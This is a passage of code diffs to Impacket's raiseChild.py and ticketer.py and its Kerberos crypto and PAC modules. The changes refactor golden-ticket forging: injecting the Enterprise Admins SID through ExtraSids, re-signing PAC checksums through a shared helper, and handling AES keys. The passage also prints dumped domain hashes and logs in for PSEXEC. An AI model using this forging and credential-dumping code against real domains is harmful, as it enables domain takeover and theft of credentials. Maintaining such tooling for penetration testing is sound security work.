         # 5) Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array
         userName = Principal(childCreds['username'], type=constants.PrincipalNameType.NT_PRINCIPAL.value)
@@ -1063,12 +1088,12 @@ class RAISECHILD:
         # then password, then an RC4 retry derived from the password if it would be distinct.
         credAttempts = []
         explicitRc4Cred = None
-        if self._has_credential_material(childCreds['aesKey']):
+        if childCreds['aesKey']:
             credAttempts.append(('AES', {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
-        if self._has_credential_material(childCreds['nthash']):
+        if childCreds['nthash']:
             explicitRc4Cred = {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}
             credAttempts.append(('RC4', explicitRc4Cred))
-        if childCreds['password'] != '':
+        if childCreds['password']:
             credAttempts.append(('password', {'lmhash': b'', 'nthash': b'', 'aesKey': None}))
             passwordRc4Cred = self._get_rc4_retry_cred(childCreds)
             if passwordRc4Cred is not None and (
@@ -1093,8 +1118,9 @@ class RAISECHILD:
                     raise
             try:
                 goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt, cipher, sessionKey,
-                                                                               credentials['nthash'], credentials['aesKey'],
-                                                                               entepriseSid + '-519')
+                                                                               credentials['nthash'], entepriseSid + '-519',
+                                                                               aes128Key=credentials.get('aes128Key'),
+                                                                               aes256Key=credentials.get('aes256Key'))
             except RetryableGoldenTicketError as e:
                 logging.warning('%s failed while building golden ticket (%s), trying next method' % (credType, e))
                 continue
@@ -1144,13 +1170,13 @@ class RAISECHILD:
         rid, credentials = self.getCredentials(targetUser, parentName, childCreds)
         print('%s/%s:%s:%s:%s:::' % (
         parentName, targetUser, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
-        print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (parentName, targetUser, credentials['aesKey'].decode("utf-8")))
+        self._printKerberosKeys(parentName, targetUser, credentials)
 
         ################ Get TargetUser credentials (Administrator credentials by default)
         logging.info('Target User account name is %s' % targetName)
         rid, credentials = self.getCredentials(targetName, parentName, childCreds)
         print('%s/%s:%s:%s:%s:::' % (parentName, targetName, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
-        print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (parentName, targetName, credentials['aesKey'].decode('utf-8')))
+        self._printKerberosKeys(parentName, targetName, credentials)
 
         targetCreds = {}
         targetCreds['username'] = targetName
@@ -1158,7 +1184,8 @@ class RAISECHILD:
         targetCreds['domain'] = parentName
         targetCreds['lmhash'] = credentials['lmhash']
         targetCreds['nthash'] = credentials['nthash']
-        targetCreds['aesKey'] = credentials['aesKey']
+        targetCreds['aes128Key'] = credentials.get('aes128Key')
+        targetCreds['aes256Key'] = credentials.get('aes256Key')
         targetCreds['TGT'] =  None
         targetCreds['TGS'] =  None
         return targetCreds, TGT, TGS

--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -1061,6 +1061,10 @@ class RAISECHILD:
         return None
 
     @staticmethod
+    def _get_preferred_aes_key(creds):
+        return creds.get('aes256Key') or creds.get('aes128Key')
+
+    @staticmethod
     def _same_rc4_creds(leftCreds, rightCreds):
         return leftCreds['lmhash'] == rightCreds['lmhash'] and leftCreds['nthash'] == rightCreds['nthash']
 
@@ -1186,6 +1190,7 @@ class RAISECHILD:
         targetCreds['nthash'] = credentials['nthash']
         targetCreds['aes128Key'] = credentials.get('aes128Key')
         targetCreds['aes256Key'] = credentials.get('aes256Key')
+        targetCreds['aesKey'] = self._get_preferred_aes_key(credentials)
         targetCreds['TGT'] =  None
         targetCreds['TGS'] =  None
         return targetCreds, TGT, TGS
@@ -1216,7 +1221,7 @@ class RAISECHILD:
             from impacket.smbconnection import SMBConnection
             s = SMBConnection('*SMBSERVER', self.__target)
             s.kerberosLogin(targetCreds['username'], '', targetCreds['domain'], targetCreds['lmhash'],
-                            targetCreds['nthash'], useCache=False)
+                            targetCreds['nthash'], targetCreds['aesKey'], useCache=False)
 
             if self.__command != 'None':
                 executer = PSEXEC(self.__command, targetCreds['username'], targetCreds['domain'], s, None, None)

--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -86,7 +86,7 @@ from impacket.krb5.types import Principal, KerberosTime
 from impacket.krb5 import constants
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, KerberosError
 from impacket.krb5.asn1 import AS_REP, AuthorizationData, AD_IF_RELEVANT, EncTicketPart
-from impacket.krb5.crypto import Key, _enctype_table, _checksum_table, Enctype
+from impacket.krb5.crypto import Key, _enctype_table
 from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
 from pyasn1.codec.der import decoder, encoder
@@ -99,9 +99,8 @@ from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_
 from impacket.dcerpc.v5.nrpc import MSRPC_UUID_NRPC, hDsrGetDcNameEx
 from impacket.dcerpc.v5.lsat import MSRPC_UUID_LSAT, POLICY_LOOKUP_NAMES, LSAP_LOOKUP_LEVEL, hLsarLookupSids
 from impacket.dcerpc.v5.lsad import hLsarQueryInformationPolicy2, POLICY_INFORMATION_CLASS, hLsarOpenPolicy2
-from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
-    PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \
-    PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, VALIDATION_INFO
+from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
+    PAC_CLIENT_INFO_TYPE, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, VALIDATION_INFO, sign_pac
 from impacket.dcerpc.v5 import transport, drsuapi, epm, samr
 from impacket.smbconnection import SessionError
 from impacket.nt_errors import STATUS_NO_LOGON_SERVERS
@@ -134,6 +133,9 @@ RemComSTDIN          = "RemCom_stdin"
 RemComSTDERR         = "RemCom_stderr"
 
 lock = Lock()
+
+class RetryableGoldenTicketError(Exception):
+    pass
 
 class PSEXEC:
     def __init__(self, command, username, domain, smbConnection, TGS, copyFile):
@@ -895,7 +897,7 @@ class RAISECHILD:
         elif cipher.enctype == constants.EncryptionTypes.rc4_hmac.value:
             key = Key(cipher.enctype, unhexlify(ntHash))
         else:
-            raise Exception('Unsupported enctype 0x%x' % cipher.enctype)
+            raise RetryableGoldenTicketError('Unsupported enctype 0x%x' % cipher.enctype)
 
         # Key Usage 2
         # AS-REP Ticket and TGS-REP Ticket (includes TGS session
@@ -981,106 +983,14 @@ class RAISECHILD:
         else:
             raise Exception('PAC_LOGON_INFO not found! Aborting')
 
-        # Let's now clear the checksums
-        if PAC_SERVER_CHECKSUM in pacInfos:
-            serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
-            serverChecksum['Signature'] = b'\x00' * len(bytes(serverChecksum['Signature']))
-        else:
-            raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
-
-        if PAC_PRIVSVR_CHECKSUM in pacInfos:
-            privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
-            privSvrChecksum['Signature'] = b'\x00' * len(bytes(privSvrChecksum['Signature']))
-        else:
-            raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
-
-        if PAC_CLIENT_INFO_TYPE in pacInfos:
-            pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
-            pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))
-        else:
+        if PAC_CLIENT_INFO_TYPE not in pacInfos:
             raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
 
 
-        # We changed everything we needed to make us special. Now let's repack and calculate checksums
-        # Update modified buffers in pacInfos
+        # We changed everything we needed to make us special. Now let's repack
+        # and calculate checksums through the shared PAC helper.
         pacInfos[PAC_LOGON_INFO] = validationInfoBlob
-        pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
-        pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
-
-        # Rebuild PAC preserving ALL original buffers in original order
-        def align8(data): return b'\x00' * (((len(data) + 7) // 8 * 8) - len(data))
-
-        # Recalculate offsets: header = 8 + num_buffers * sizeof(PAC_INFO_BUFFER)
-        numBuffers = len(pacInfos)
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * numBuffers
-
-        infoBuffers = b''
-        dataBlobs = b''
-        for ulType, data in pacInfos.items():
-            ib = PAC_INFO_BUFFER()
-            ib['ulType'] = ulType
-            ib['cbBufferSize'] = len(data)
-            ib['Offset'] = offsetData
-            infoBuffers += ib.getData()
-            padding = align8(data)
-            dataBlobs += data + padding
-            offsetData = (offsetData + len(data) + 7) // 8 * 8
-
-        pacType = PACTYPE()
-        pacType['cBuffers'] = numBuffers
-        pacType['Version'] = 0
-        pacType['Buffers'] = infoBuffers + dataBlobs
-
-        blobToChecksum = pacType.getData()
-
-        # If you want to do MD5, ucomment this
-        checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
-        sigLen = len(bytes(serverChecksum['Signature']))
-        if sigLen == 12 and aesKey:
-            keyServer = Key(Enctype.AES256, unhexlify(aesKey))
-            serverChecksum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
-            checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
-        elif serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
-            keyServer = Key(Enctype.AES256, unhexlify(aesKey))
-        elif serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
-            keyServer = Key(Enctype.RC4, unhexlify(ntHash))
-        else:
-            raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])
-
-        checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
-        privSigLen = len(bytes(privSvrChecksum['Signature']))
-        if privSigLen == 12 and aesKey:
-            keyPriv = Key(Enctype.AES256, unhexlify(aesKey))
-            privSvrChecksum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
-            checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
-        elif privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
-            keyPriv = Key(Enctype.AES256, unhexlify(aesKey))
-        elif privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
-            keyPriv = Key(Enctype.RC4, unhexlify(ntHash))
-        else:
-            raise Exception('Invalid Priv checksum type 0x%x' % privSvrChecksum['SignatureType'])
-
-        serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, 17, blobToChecksum)
-        privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, 17, serverChecksum['Signature'])
-
-        # Update checksums in pacInfos and rebuild final PAC
-        pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
-        pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
-
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * numBuffers
-        infoBuffers = b''
-        dataBlobs = b''
-        for ulType, data in pacInfos.items():
-            ib = PAC_INFO_BUFFER()
-            ib['ulType'] = ulType
-            ib['cbBufferSize'] = len(data)
-            ib['Offset'] = offsetData
-            infoBuffers += ib.getData()
-            padding = align8(data)
-            dataBlobs += data + padding
-            offsetData = (offsetData + len(data) + 7) // 8 * 8
-
-        pacType['Buffers'] = infoBuffers + dataBlobs
+        pacType = sign_pac(pacInfos, aes_key=aesKey, nt_hash=ntHash, infer_aes_signature_type=True)
 
         authorizationData = AuthorizationData()
         authorizationData[0] = noValue
@@ -1098,7 +1008,7 @@ class RAISECHILD:
         elif cipher.enctype == constants.EncryptionTypes.rc4_hmac.value:
             key = Key(cipher.enctype, unhexlify(ntHash))
         else:
-            raise Exception('Unsupported enctype 0x%x' % cipher.enctype)
+            raise RetryableGoldenTicketError('Unsupported enctype 0x%x' % cipher.enctype)
 
         # Key Usage 2
         # AS-REP Ticket and TGS-REP Ticket (includes TGS session
@@ -1181,9 +1091,13 @@ class RAISECHILD:
                     continue
                 else:
                     raise
-            goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt, cipher, sessionKey,
-                                                                           credentials['nthash'], credentials['aesKey'],
-                                                                           entepriseSid + '-519')
+            try:
+                goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt, cipher, sessionKey,
+                                                                               credentials['nthash'], credentials['aesKey'],
+                                                                               entepriseSid + '-519')
+            except RetryableGoldenTicketError as e:
+                logging.warning('%s failed while building golden ticket (%s), trying next method' % (credType, e))
+                continue
             TGT['KDC_REP'] = goldenTicket
             TGT['cipher'] = goldenCipher
             TGT['oldSessionKey'] = oldSessionKey

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -73,7 +73,7 @@ from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationData
     PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \
     KERB_NON_KERB_CKSUM_SALT
 from impacket.krb5.keytab import Keytab
-from impacket.krb5.crypto import Key, _enctype_table
+from impacket.krb5.crypto import Key, _enctype_table, get_kerberos_key_for_enctype
 from impacket.krb5.crypto import Enctype
 from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_LOGON_INFO, \
     PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
@@ -894,14 +894,11 @@ class TICKETER:
         encodedEncTicketPart = encoder.encode(encTicketPart)
 
         cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]
-        if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
-            key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
-        elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
-            key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
-        elif cipher.enctype == EncryptionTypes.rc4_hmac.value:
-            key = Key(cipher.enctype, unhexlify(self.__options.nthash))
-        else:
-            raise Exception('Unsupported enctype 0x%x' % cipher.enctype)
+        key = get_kerberos_key_for_enctype(
+            cipher.enctype,
+            nt_hash=self.__options.nthash,
+            generic_aes_key=self.__options.aesKey,
+        )
 
         # Key Usage 2
         # AS-REP Ticket and TGS-REP Ticket (includes TGS session

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -74,9 +74,9 @@ from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationData
     KERB_NON_KERB_CKSUM_SALT
 from impacket.krb5.keytab import Keytab
 from impacket.krb5.crypto import Key, _enctype_table
-from impacket.krb5.crypto import _checksum_table, Enctype
-from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
-    PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
+from impacket.krb5.crypto import Enctype
+from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_LOGON_INFO, \
+    PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
     VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO, UPN_DNS_INFO_FULL, PAC_REQUESTOR_INFO, PAC_UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR, \
     PAC_ATTRIBUTE_INFO
 from impacket.krb5.types import KerberosTime, Principal
@@ -117,11 +117,11 @@ class TICKETER:
 
     @staticmethod
     def getPadLength(data_length):
-        return ((data_length + 7) // 8 * 8) - data_length
+        return pac.get_pad_length(data_length)
 
     @staticmethod
     def getBlockLength(data_length):
-        return (data_length + 7) // 8 * 8
+        return pac.get_block_length(data_length)
 
     def loadKeysFromKeytab(self, filename):
         keytab = Keytab.loadFile(filename)
@@ -869,152 +869,14 @@ class TICKETER:
     def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
         logging.info('Signing/Encrypting final ticket')
 
-        # Basic PAC count
-        pac_count = 4
+        bufferOrder = [PAC_LOGON_INFO, PAC_CLIENT_INFO_TYPE]
+        for optionalType in (PAC_UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR_INFO):
+            if optionalType in pacInfos:
+                bufferOrder.append(optionalType)
+        bufferOrder.extend([PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM])
 
-        # We changed everything we needed to make us special. Now let's repack and calculate checksums
-        validationInfoBlob = pacInfos[PAC_LOGON_INFO]
-        validationInfoAlignment = b'\x00' * self.getPadLength(len(validationInfoBlob))
-
-        pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
-        pacClientInfoAlignment = b'\x00' * self.getPadLength(len(pacClientInfoBlob))
-
-        pacUpnDnsInfoBlob = None
-        pacUpnDnsInfoAlignment = None
-        if PAC_UPN_DNS_INFO in pacInfos:
-            pac_count += 1
-            pacUpnDnsInfoBlob = pacInfos[PAC_UPN_DNS_INFO]
-            pacUpnDnsInfoAlignment = b'\x00' * self.getPadLength(len(pacUpnDnsInfoBlob))
-
-        pacAttributesInfoBlob = None
-        pacAttributesInfoAlignment = None
-        if PAC_ATTRIBUTES_INFO in pacInfos:
-            pac_count += 1
-            pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
-            pacAttributesInfoAlignment = b'\x00' * self.getPadLength(len(pacAttributesInfoBlob))
-
-        pacRequestorInfoBlob = None
-        pacRequestorInfoAlignment = None
-        if PAC_REQUESTOR_INFO in pacInfos:
-            pac_count += 1
-            pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
-            pacRequestorInfoAlignment = b'\x00' * self.getPadLength(len(pacRequestorInfoBlob))
-
-        serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
-        serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
-        serverChecksumAlignment = b'\x00' * self.getPadLength(len(serverChecksumBlob))
-
-        privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
-        privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
-        privSvrChecksumAlignment = b'\x00' * self.getPadLength(len(privSvrChecksumBlob))
-
-        # The offset are set from the beginning of the PAC_TYPE
-        # [MS-PAC] 2.4 PAC_INFO_BUFFER
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * pac_count
-
-        # Let's build the PAC_INFO_BUFFER for each one of the elements
-        validationInfoIB = PAC_INFO_BUFFER()
-        validationInfoIB['ulType'] = PAC_LOGON_INFO
-        validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
-        validationInfoIB['Offset'] = offsetData
-        offsetData = self.getBlockLength(offsetData + validationInfoIB['cbBufferSize'])
-
-        pacClientInfoIB = PAC_INFO_BUFFER()
-        pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
-        pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
-        pacClientInfoIB['Offset'] = offsetData
-        offsetData = self.getBlockLength(offsetData + pacClientInfoIB['cbBufferSize'])
-
-        pacUpnDnsInfoIB = None
-        if pacUpnDnsInfoBlob is not None:
-            pacUpnDnsInfoIB = PAC_INFO_BUFFER()
-            pacUpnDnsInfoIB['ulType'] = PAC_UPN_DNS_INFO
-            pacUpnDnsInfoIB['cbBufferSize'] = len(pacUpnDnsInfoBlob)
-            pacUpnDnsInfoIB['Offset'] = offsetData
-            offsetData = self.getBlockLength(offsetData + pacUpnDnsInfoIB['cbBufferSize'])
-
-        pacAttributesInfoIB = None
-        if pacAttributesInfoBlob is not None:
-            pacAttributesInfoIB = PAC_INFO_BUFFER()
-            pacAttributesInfoIB['ulType'] = PAC_ATTRIBUTES_INFO
-            pacAttributesInfoIB['cbBufferSize'] = len(pacAttributesInfoBlob)
-            pacAttributesInfoIB['Offset'] = offsetData
-            offsetData = self.getBlockLength(offsetData + pacAttributesInfoIB['cbBufferSize'])
-
-        pacRequestorInfoIB = None
-        if pacRequestorInfoBlob is not None:
-            pacRequestorInfoIB = PAC_INFO_BUFFER()
-            pacRequestorInfoIB['ulType'] = PAC_REQUESTOR_INFO
-            pacRequestorInfoIB['cbBufferSize'] = len(pacRequestorInfoBlob)
-            pacRequestorInfoIB['Offset'] = offsetData
-            offsetData = self.getBlockLength(offsetData + pacRequestorInfoIB['cbBufferSize'])
-
-        serverChecksumIB = PAC_INFO_BUFFER()
-        serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
-        serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
-        serverChecksumIB['Offset'] = offsetData
-        offsetData = self.getBlockLength(offsetData + serverChecksumIB['cbBufferSize'])
-
-        privSvrChecksumIB = PAC_INFO_BUFFER()
-        privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
-        privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
-        privSvrChecksumIB['Offset'] = offsetData
-        # offsetData = self.getBlockLength(offsetData+privSvrChecksumIB['cbBufferSize'])
-
-        # Building the PAC_TYPE as specified in [MS-PAC]
-        buffers = validationInfoIB.getData() + pacClientInfoIB.getData()
-        if pacUpnDnsInfoIB is not None:
-            buffers += pacUpnDnsInfoIB.getData()
-        if pacAttributesInfoIB is not None:
-            buffers += pacAttributesInfoIB.getData()
-        if pacRequestorInfoIB is not None:
-            buffers += pacRequestorInfoIB.getData()
-
-        buffers += serverChecksumIB.getData() + privSvrChecksumIB.getData() + validationInfoBlob + \
-            validationInfoAlignment + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
-        if pacUpnDnsInfoIB is not None:
-            buffers += pacUpnDnsInfoBlob + pacUpnDnsInfoAlignment
-        if pacAttributesInfoIB is not None:
-            buffers += pacAttributesInfoBlob + pacAttributesInfoAlignment
-        if pacRequestorInfoIB is not None:
-            buffers += pacRequestorInfoBlob + pacRequestorInfoAlignment
-
-        buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
-
-        pacType = PACTYPE()
-        pacType['cBuffers'] = pac_count
-        pacType['Version'] = 0
-        pacType['Buffers'] = buffers + buffersTail
-
-        blobToChecksum = pacType.getData()
-
-        checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
-        if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
-            keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
-        elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
-            keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
-        elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
-            keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))
-        else:
-            raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])
-
-        checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
-        if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
-            keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
-        elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
-            keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
-        elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
-            keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))
-        else:
-            raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'])
-
-        serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)
-        logging.info('\tPAC_SERVER_CHECKSUM')
-        privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])
-        logging.info('\tPAC_PRIVSVR_CHECKSUM')
-
-        buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
-        pacType['Buffers'] = buffers + buffersTail
+        pacType = pac.sign_pac(pacInfos, aes_key=self.__options.aesKey, nt_hash=self.__options.nthash,
+                               buffer_order=bufferOrder, checksum_salt=KERB_NON_KERB_CKSUM_SALT)
 
         authorizationData = AuthorizationData()
         authorizationData[0] = noValue

--- a/impacket/krb5/crypto.py
+++ b/impacket/krb5/crypto.py
@@ -704,6 +704,50 @@ def verify_checksum(cksumtype, key, keyusage, text, cksum):
     c.verify(key, keyusage, text, cksum)
 
 
+def get_hex_key_length(key):
+    if not key:
+        return None
+    return len(unhexlify(key))
+
+
+def get_matching_aes_key(enctype, generic_aes_key=None, aes128_key=None, aes256_key=None):
+    if enctype == Enctype.AES256:
+        if aes256_key:
+            return aes256_key
+        if get_hex_key_length(generic_aes_key) == 32:
+            return generic_aes_key
+        return None
+
+    if enctype == Enctype.AES128:
+        if aes128_key:
+            return aes128_key
+        if get_hex_key_length(generic_aes_key) == 16:
+            return generic_aes_key
+        return None
+
+    return None
+
+
+def get_kerberos_key_for_enctype(enctype, nt_hash=None, generic_aes_key=None, aes128_key=None, aes256_key=None):
+    if enctype in (Enctype.AES256, Enctype.AES128):
+        matching_aes_key = get_matching_aes_key(
+            enctype,
+            generic_aes_key=generic_aes_key,
+            aes128_key=aes128_key,
+            aes256_key=aes256_key,
+        )
+        if matching_aes_key is None:
+            raise ValueError('Missing AES key for enctype 0x%x' % enctype)
+        return Key(enctype, unhexlify(matching_aes_key))
+
+    if enctype == Enctype.RC4:
+        if not nt_hash:
+            raise ValueError('Missing NT hash for enctype 0x%x' % enctype)
+        return Key(enctype, unhexlify(nt_hash))
+
+    raise ValueError('Unsupported enctype 0x%x' % enctype)
+
+
 def cf2(enctype, key1, key2, pepper1, pepper2):
     # Combine two keys and two pepper strings to produce a result key
     # of type enctype, using the RFC 6113 KRB-FX-CF2 function.

--- a/impacket/krb5/pac.py
+++ b/impacket/krb5/pac.py
@@ -14,10 +14,14 @@
 # Author:
 #   Alberto Solino (@agsolino)
 #
+from binascii import Error as BinasciiError, unhexlify
+
 from impacket.dcerpc.v5.dtypes import ULONG, RPC_UNICODE_STRING, FILETIME, PRPC_SID, USHORT, RPC_SID, SID
 from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER
 from impacket.dcerpc.v5.nrpc import USER_SESSION_KEY, CHAR_FIXED_8_ARRAY, PUCHAR_ARRAY, PRPC_UNICODE_STRING_ARRAY
 from impacket.dcerpc.v5.rpcrt import TypeSerialization1
+from impacket.krb5 import constants
+from impacket.krb5.crypto import Key, _checksum_table, Enctype
 from impacket.ldap.ldaptypes import LDAP_SID
 from impacket.structure import Structure
 
@@ -270,3 +274,134 @@ class PAC_REQUESTOR(Structure):
         ('UserSid',':',SID),
     )
 
+
+def get_pad_length(data_length):
+    return get_block_length(data_length) - data_length
+
+
+def get_block_length(data_length):
+    return (data_length + 7) // 8 * 8
+
+
+def _coerce_hex_key(key):
+    if key in (None, '', b''):
+        return None
+
+    try:
+        return unhexlify(key)
+    except (TypeError, BinasciiError):
+        if isinstance(key, bytes):
+            return key
+        return key.encode('utf-8')
+
+
+def _ordered_buffer_types(pac_infos, buffer_order=None):
+    ordered_types = []
+    seen = set()
+
+    if buffer_order is not None:
+        for ul_type in buffer_order:
+            if ul_type in pac_infos and ul_type not in seen:
+                ordered_types.append(ul_type)
+                seen.add(ul_type)
+
+    for ul_type in pac_infos:
+        if ul_type not in seen:
+            ordered_types.append(ul_type)
+
+    return ordered_types
+
+
+def build_pac_type(pac_infos, buffer_order=None):
+    ordered_types = _ordered_buffer_types(pac_infos, buffer_order)
+    offset_data = 8 + len(PAC_INFO_BUFFER().getData()) * len(ordered_types)
+    info_buffers = b''
+    data_blobs = b''
+
+    for ul_type in ordered_types:
+        data = pac_infos[ul_type]
+
+        info_buffer = PAC_INFO_BUFFER()
+        info_buffer['ulType'] = ul_type
+        info_buffer['cbBufferSize'] = len(data)
+        info_buffer['Offset'] = offset_data
+        info_buffers += info_buffer.getData()
+
+        data_blobs += data + (b'\x00' * get_pad_length(len(data)))
+        offset_data = get_block_length(offset_data + len(data))
+
+    pac_type = PACTYPE()
+    pac_type['cBuffers'] = len(ordered_types)
+    pac_type['Version'] = 0
+    pac_type['Buffers'] = info_buffers + data_blobs
+    return pac_type
+
+
+def _normalize_pac_checksum_type(signature_type, signature_length, aes_key, infer_aes_signature_type):
+    if infer_aes_signature_type and aes_key is not None and signature_length == 12:
+        if len(aes_key) == 16:
+            return constants.ChecksumTypes.hmac_sha1_96_aes128.value
+        if len(aes_key) == 32:
+            return constants.ChecksumTypes.hmac_sha1_96_aes256.value
+    return signature_type
+
+
+def _get_checksum_context(signature_type, aes_key, nt_hash, checksum_name):
+    checksum_function = _checksum_table[signature_type]
+
+    if signature_type == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
